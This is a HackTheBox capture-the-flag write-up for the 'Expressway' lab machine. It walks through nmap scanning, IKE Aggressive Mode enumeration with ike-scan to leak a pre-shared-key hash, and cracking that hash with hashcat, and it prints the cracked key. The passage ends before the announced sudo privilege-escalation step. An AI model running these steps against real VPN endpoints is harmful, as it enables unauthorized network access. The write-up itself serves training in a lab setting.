HackTheBox: Expressway - Writeup
Machine Information
- Hostname: expressway.htb
- Difficulty: easy
- OS: Linux (Debian)
- Services: SSH, IPSec VPN
Executive Summary
Expressway is a Linux machine that demonstrates the dangers of weak IPSec VPN configurations and sudo vulnerabilities. Initial access is gained by exploiting IKE Aggressive Mode to retrieve and crack a weak pre-shared key (PSK), allowing SSH access. Privilege escalation is achieved through CVE-2025-32463, a sudo chroot escape vulnerability.
Enumeration
Initial Port Scanning
Starting with a standard TCP service scan to identify open ports and running services:
nmap -sV -sC 10.129.x.x
Full Results:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-20 14:45 CDT
Nmap scan report for Expressway.htb (10.129.x.x)
Host is up (0.0091s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.86 seconds
Only SSH is exposed on TCP, suggesting we need to look deeper.
UDP Scanning
Since TCP yielded limited results, let's check for UDP services:
nmap -sU 10.129.x.x --min-rate 5000
Full Results:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-20 14:48 CDT
Nmap scan report for Expressway.htb (10.129.x.x)
Host is up (0.011s latency).
Not shown: 993 open|filtered udp ports (no-response)
PORT STATE SERVICE
500/udp open isakmp
Nmap done: 1 IP address (1 host up) scanned in 0.73 seconds
Port 500/udp indicates an IPSec VPN service is running. ISAKMP (Internet Security Association and Key Management Protocol) is used for establishing Security Associations in IPSec.
VPN Service Analysis
IKE (Internet Key Exchange) Enumeration
The presence of port 500/udp suggests IPSec VPN. Let's use ike-scan to enumerate the IKE service:
sudo ike-scan -M expressway.htb
Full Output:
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.x.x Main Mode Handshake returned
HDR=(CKY-R=9f82d861ee3ca556)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Ending ike-scan 1.9.5: 1 hosts scanned in 0.124 seconds (8.07 hosts/sec). 1 returned handshake; 0 returned notify
Key Observations:
- Main Mode handshake successful
- Encryption: 3DES (weak by modern standards)
- Hash: SHA1
- Authentication: PSK (Pre-Shared Key)
- XAUTH support detected
- Dead Peer Detection enabled
Aggressive Mode Testing
Main Mode protects the hash exchange, but Aggressive Mode sends hashes in clear text, making them susceptible to offline cracking:
sudo ike-scan -A -Ppsk.txt expressway.htb
Critical Discovery:
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.x.x Aggressive Mode Handshake returned
HDR=(CKY-R=11ddb728fb4c93f1)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, [email protected])
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.5: 1 hosts scanned in 0.016 seconds (60.74 hosts/sec). 1 returned handshake; 0 returned notify
Success! Aggressive Mode leaked:
- User Identity:
[email protected] - PSK hash saved to
psk.txt - Full handshake with KeyExchange, Nonce, and Hash data captured
Hash Cracking
Extracting the PSK
The Aggressive Mode response contains the IKE PSK hash. Let's crack it using hashcat:
hashcat psk.txt /usr/share/wordlists/rockyou.txt
Hashcat auto-detects the hash type as:
- Hash Mode: 5400 (IKE-PSK SHA1)
To view the cracked result:
hashcat psk.txt /usr/share/wordlists/rockyou.txt --show
Full Output:
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5400 | IKE-PSK SHA1 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
ac40728b45d9e097252ecef2c31da0e2d081ccc2163b6b6cac087a087ad8ded7ed8f27539964b2779e2c5e547d74aa282b3a8afd449d4b8cbbf4cfa9ad0cfc896b65a90599b84b2b67728cb434db8bf048897070db8996988ba70d584167d5c029bb8e36e31f123ce2bafa9f9aa850fcb917aa2ecc8d1a07c64ab32016e03533:168cef94af426be072780df8b134faf08741bf3b62e1e93c657a19f0e11a2fca668da45cc9c7561100ce28085fd3e27136d731225549c71e77379e75fc2224676f4219a91f9cac53e8fc849b4d72d633b7ad42f138a2c1f55416db4c428e6d6d8d2dbeada86dc81d9d1c040795080f91f9237f793ac4f038db157644ecd8a724:11ddb728fb4c93f1:ecb2bdd2ba3e7df7:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e68:0925fbf9f188daf8bb3f4fbace1167d63a0e63a0:2a6b8d6ae489335962160c9caeb668bf7e77b6c2e51a5675d693504a87d1b093:b211eb1d061230d3e072758b8e581cff96aecee1:freakingrockstarontheroad
Cracked Credentials:
- Username: ike